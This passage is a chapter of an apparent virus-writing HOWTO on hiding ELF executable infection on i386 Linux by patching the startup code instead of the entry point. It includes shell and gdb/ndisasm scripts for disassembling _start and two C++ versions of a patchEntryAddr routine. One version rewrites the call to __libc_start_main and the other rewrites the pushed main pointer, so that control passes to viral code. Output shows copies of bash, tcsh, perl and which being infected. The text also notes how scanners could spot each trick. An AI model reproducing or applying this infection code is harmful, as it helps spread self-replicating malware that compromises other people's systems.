8. The entry point

 

The longest part of the journey is said to be the passing of the gate.

 Marcus Terentius Varro

If we chose to leave entry_point as it is, we have to patch something else. One approach is to disassemble the code, starting at entry_point, find the first call (or jmp) and abuse it. This requires way too much intelligence for a virus, though. But then we are operating in a homogeneous environment, having one compiler and one C run-time library for all. The startup code should be the same for every executable.

The following script automates the exercise from Enter evil. Using od(1) to retrieve the entry point is faster than readelf(1). Especially since the latter returns a lowercase hexadecimal number that requires tr(1) and bc(1) to process.

Command: src/entry_point/gdb.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )
gdb ${file} -q <<EOT | sed -n -e '/:/p' -e '/ret *$/q' -e '/hlt *$/q'
	break *$entry_point
	run
	set disassembly-flavor intel
	disassemble
EOT

Output: out/redhat-linux-i386/entry_point/sh.gdb
(gdb) Starting program: /bin/bash 
(gdb) (gdb) Dump of assembler code for function _start:
0x8059380 <_start>:	xor    ebp,ebp
0x8059382 <_start+2>:	pop    esi
0x8059383 <_start+3>:	mov    ecx,esp
0x8059385 <_start+5>:	and    esp,0xfffffff0
0x8059388 <_start+8>:	push   eax
0x8059389 <_start+9>:	push   esp
0x805938a <_start+10>:	push   edx
0x805938b <_start+11>:	push   0x80ad030
0x8059390 <_start+16>:	push   0x8058a60
0x8059395 <_start+21>:	push   ecx
0x8059396 <_start+22>:	push   esi
0x8059397 <_start+23>:	push   0x8059480
0x805939c <_start+28>:	call   0x8058fc8 <__libc_start_main>
0x80593a1 <_start+33>:	hlt    

8.1. Disassemble it again, Sam

Of course we have to implement a check whether the code at the entry address really looks like above output. Just in case the target is already infected (by a superior virus). To implement a comparison we only need offset and size, not actual opcodes. But I will feel better after I have them straight in front of me. And ndisasm(1) starts counting with zero, which demands less brain activity.

Command: src/entry_point/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )

# 134512640 = 0x8048000
entry_point_ofs=$( expr ${entry_point} - 134512640 )

ndisasm -e ${entry_point_ofs} -o ${entry_point} -U ${file} \
| sed -e '/ret/q' -e '/hlt/q'

Output: out/redhat-linux-i386/entry_point/sh.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880940508        push dword 0x8059480
0805939C  E827FCFFFF        call 0x8058fc8
080593A1  F4                hlt

8.2. patchEntryAddr 2.0

There is one remaining issue. Elf32_Ehdr::e_entry is an absolute address, as is the value popped off the stack by ret. The operand of call and jmp is encoded relative to the location of the following instruction, however. The following is taken from the documentation of nasm. [1]

CALL imm                      ; E8 rw/rd             [8086]

[…] The codes rb, rw and rd indicate that one of the operands to the instruction is an immediate value, and that the difference between this value and the address of the end of the instruction is to be encoded as a byte, word or doubleword respectively. Where the form rw/rd appears, it indicates that either rw or rd should be used according to whether assembly is being performed in BITS 16 or BITS 32 state respectively.

Source: src/one_step_closer/e2/patch_entry_addr.inc
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int beyond_the_call = p.ehdr->e_entry + 0x21; 
  int* patch_point = (int*)(target_entry_code + 0x1D);
  original_entry = beyond_the_call + *patch_point;
  *patch_point = newEntryAddr() - beyond_the_call;

  return true;
}

Output: out/redhat-linux-i386/one_step_closer/e2i1/cc
Infecting copy of /bin/tcsh... wrote 26 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 26 bytes, Ok
Infecting copy of /usr/bin/which... wrote 26 bytes, Ok
Infecting copy of /bin/sh... wrote 26 bytes, Ok

Output: out/redhat-linux-i386/one_step_closer/test-e2i1
ELF/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/one_step_closer/e2i1/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux

ELFGNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.

8.3. Second verse, same as the first

Output looks nice, but we had that already. What has increased code size and complexity gained us?

Source: src/entry_point/entry_point.sh
#!/bin/sh
( readelf -l /bin/bash
  readelf -l ${TMP}/one_step_closer/e1i1/sh_infected
  readelf -l ${TMP}/one_step_closer/e2i1/sh_infected
) | grep '^Entry point'

Output: out/redhat-linux-i386/entry_point/entry_point
Entry point 0x8059380
Entry point 0x80c1280
Entry point 0x8059380

OK. One vulnerability of the infection is not visible to readelf(1) anymore. But does that really help? It's still possible to write a heuristic scanner for it. All it takes is to verify the operand of call shown in the disassembly listing.

Output: out/redhat-linux-i386/entry_point/e2.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880940508        push dword 0x8059480
0805939C  E8DF7E0600        call 0x80c1280
080593A1  F4                hlt

Original value is 0x8058fc8, which resolves into a shared library. The new value is local to the executable and easy to spot: 0x80c1280. So what's the point?

8.4. Use the Source, Luke

gdb(1) revealed us the name of the function whose call we abused: __libc_start_main. I can't help thinking that it is part of glibc, but don't be hasty.

Command: src/entry_point/ldd.sh
#!/bin/sh
ldd /bin/bash

Output: out/redhat-linux-i386/entry_point/ldd
	libtermcap.so.2 => /lib/libtermcap.so.2 (0x40021000)
	libdl.so.2 => /lib/libdl.so.2 (0x40025000)
	libc.so.6 => /lib/libc.so.6 (0x40029000)
	/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

Now that we have a filename we can search the function in the library.

Command: src/entry_point/nm.sh
#!/bin/sh
library=$( ldd /bin/bash | perl -ane 'm/libc/ && print $F[2];' )
nm -D $library --line-numbers --no-sort | grep __libc_start_main

Output: out/redhat-linux-i386/entry_point/nm
0001c288 T __libc_start_main	/usr/src/build/85131-i386/BUILD/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c:53

First class service. We even got a line number from nm(1).

Command: src/entry_point/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/entry_point/__libc_start_main}

# third character of IFS is a tab-stop, not just a space
IFS=' :	'
read addr type name original_filename line_number \
< ${OUT}/entry_point/nm
filename="/usr/src/redhat/SOURCES/${original_filename#*BUILD/}"

# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -e "${filename}" ] || exit 0

( echo "# ${filename}"
  echo ""
  start=$( expr ${line_number} - 7 )
  nl -ba -p ${filename} | sed -n "${start},${line_number} p"
) > ${output}

Output: src/entry_point/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/csu/../sysdeps/generic/libc-start.c

    46	int
    47	/* GKM FIXME: GCC: this should get __BP_ prefix by virtue of the
    48	   BPs in the arglist of startup_info.main and startup_info.init. */
    49	BP_SYM (__libc_start_main) (int (*main) (int, char **, char **),
    50			   int argc, char *__unbounded *__unbounded ubp_av,
    51			   void (*init) (void), void (*fini) (void),
    52			   void (*rtld_fini) (void), void *__unbounded stack_end)
    53	{

If you have a procedure with 10 parameters, you probably missed some (according to an old saying).

Let's see what this declaration tells about the disassembled code. For one thing, arguments are pushed in reverse order on the stack. This is the traditional way of the C. It allows easy implementation of functions like printf(3) that take an arbitrary number of arguments. Actual values for arguments: main = 0x8059480, init = 0x8058a60, fini = 0x80ad030.

The case of rtld_fini needs more documentation. [2] A comment from glibc's /usr/include/asm/elf.h:

/* SVR4/i386 ABI (pages 3-31, 3-32) says that when the program
    starts %edx contains a pointer to a function
    which might be registered using atexit.
    This provides a mean for the dynamic linker to call
    DT_FINI functions for shared libraries that
    have been loaded before the code runs.
    A value of 0 tells we have no such handler.

Anyway, even without looking at the complete source of __libc_start_main I would guess that each of these function pointers is invoked at some time. Efforts are concentrated on main.

8.5. patchEntryAddr 3.0

Source: src/one_step_closer/e3/patch_entry_addr.inc
bool Target::patchEntryAddr()
{
  Elf32_Ehdr* self = (Elf32_Ehdr*)0x8048000;
  unsigned char* self_entry_code = (unsigned char*)self->e_entry;
  unsigned char* target_entry_code = p.b + (p.ehdr->e_entry - 0x8048000);

  if (0 != memcmp(self_entry_code, target_entry_code, 0xc))
    return false;

  /* check for last "push" */
  if (self_entry_code[0x17] != target_entry_code[0x17])
    return false;

  /* check for "call" */
  if (self_entry_code[0x1c] != target_entry_code[0x1c])
    return false;

  /* check for "hlt" */
  if (self_entry_code[0x21] != target_entry_code[0x21])
    return false;

  int* patch_point = (int*)(target_entry_code + 0x18);
  original_entry = *patch_point;
  *patch_point = newEntryAddr();

  return true;
}

Output: out/redhat-linux-i386/one_step_closer/test-e3i1
ELF/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/one_step_closer/e3i1/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF/usr/bin/which
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux

ELFGNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.

8.6. Two is company, three is an orgy

We see the same nice output again and again. So what's different this time?

Output: out/redhat-linux-i386/entry_point/e3.ndisasm
08059380  31ED              xor ebp,ebp
08059382  5E                pop esi
08059383  89E1              mov ecx,esp
08059385  83E4F0            and esp,byte -0x10
08059388  50                push eax
08059389  54                push esp
0805938A  52                push edx
0805938B  6830D00A08        push dword 0x80ad030
08059390  68608A0508        push dword 0x8058a60
08059395  51                push ecx
08059396  56                push esi
08059397  6880120C08        push dword 0x80c1280
0805939C  E827FCFFFF        call 0x8058fc8
080593A1  F4                hlt

The difference to the original is less obvious. Both values of main are local to the executable. But again the modified value is less than 4096 bytes from the end of the code segment.

It seems that we achieved little. But the concept of studying source code to find patch points looks promising.

Notes

[1]

Section A.2 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.2 and A.13 at http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.13.

[2]

http://linuxassembly.org/startup.html